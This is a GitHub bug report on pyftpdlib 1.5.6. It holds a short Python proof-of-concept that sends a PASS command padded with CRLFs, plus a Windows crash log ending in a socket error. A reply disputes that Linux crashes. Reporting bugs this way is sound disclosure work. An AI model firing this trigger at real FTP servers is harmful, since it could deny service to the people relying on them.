Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

pyftpdlib 1.5.6 remote crash bug on windows #575

Open
dazhouzhou opened this issue Apr 12, 2022 · 1 comment
Open

pyftpdlib 1.5.6 remote crash bug on windows #575

dazhouzhou opened this issue Apr 12, 2022 · 1 comment

Comments

@dazhouzhou
Copy link

I used LaiFu to fuzz pyftpdlib on windows 10 and I found a remote crash bug. Detailed details are as follows:

  • run pyftpdlib
python -m pyftpdlib -u fuzzer -P passwd --debug
  • run poc.py
import socket

host = "127.0.0.1"
port = 2121

pkt1 = bytes.fromhex("555345522066757a7a65720d0a")
pkt2 = bytes.fromhex("50415353200d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a")

if __name__ == "__main__":
    # python -m pyftpdlib -u fuzzer -P passwd --debug
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.recv(1024)
    sock.send(pkt1)
    sock.recv(10000)
    sock.send(pkt2)
    sock.recv(10000)
    sock.close()
  • crash log
[I 2022-04-12 09:48:49] concurrency model: async
[I 2022-04-12 09:48:49] masquerade (NAT) address: None
[I 2022-04-12 09:48:49] passive ports: None
[D 2022-04-12 09:48:49] poller: 'pyftpdlib.ioloop.Select'
[D 2022-04-12 09:48:49] authorizer: 'pyftpdlib.authorizers.DummyAuthorizer'
[D 2022-04-12 09:48:49] handler: 'pyftpdlib.handlers.type'
[D 2022-04-12 09:48:49] max connections: 512
[D 2022-04-12 09:48:49] max connections per ip: unlimited
[D 2022-04-12 09:48:49] timeout: 300
[D 2022-04-12 09:48:49] banner: 'pyftpdlib 1.5.6 ready.'
[D 2022-04-12 09:48:49] max login attempts: 3
[I 2022-04-12 09:48:49] >>> starting FTP server on 0.0.0.0:2121, pid=11208 <<<
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session opened (connect)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 220 pyftpdlib 1.5.6 ready.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <- USER fuzzer
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 331 Username ok, send password.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[fuzzer] <- PASS ******
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: send(), err: [WinError 10053] 你的主机中的软件中止了一个已建立的连接。 (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: unregister(); fd was no longer in socket_map (<pyftpdlib.ioloop.Select (fds=1, tasks=2) at 0x27d52002110>)
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session closed (disconnect).
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:55] [debug] closing IOLoop (<pyftpdlib.ioloop.Select (fds=2, tasks=1) at 0x27d52002110>)
[D 2022-04-12 09:48:55] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
Traceback (most recent call last):
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 122, in <module>
    main()
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 116, in main
    ftpd.serve_forever(timeout=2 if os.name == 'nt' else None)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\servers.py", line 245, in serve_forever
    self.ioloop.loop(timeout, blocking)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 343, in loop
    poll(timeout)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 446, in poll
    r, w, e = select.select(self._r, self._w, [], timeout)
OSError: [WinError 10038] 在一个非套接字上尝试了一个操作。
@nrathaus
Copy link

While an error does print out, the process itself doesn't seem to crash or fault (at least one Linux):

[E 2024-02-19 09:27:52] unhandled exception in instance <FTPHandler(id=140292931745584, addr='192.168.8.1:35598')>
    Traceback (most recent call last):
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/ioloop.py", line 232, in call
        self._target(*self._args, **self._kwargs)
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/handlers.py", line 2534, in callback
        self.add_channel()
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/ioloop.py", line 795, in add_channel
        self.ioloop.register(self._fileno, self, events)
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/ioloop.py", line 495, in register
        self._poller.register(fd, events)
    OSError: [Errno 9] Bad file descriptor
[D 2024-02-19 09:27:52] [debug] call: close() (<FTPHandler(id=140292931745584, addr='192.168.8.1:35598')>)

The fault seems to be cause by you closing the connection without completing the command, causing the FTP server side to complain

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@nrathaus @dazhouzhou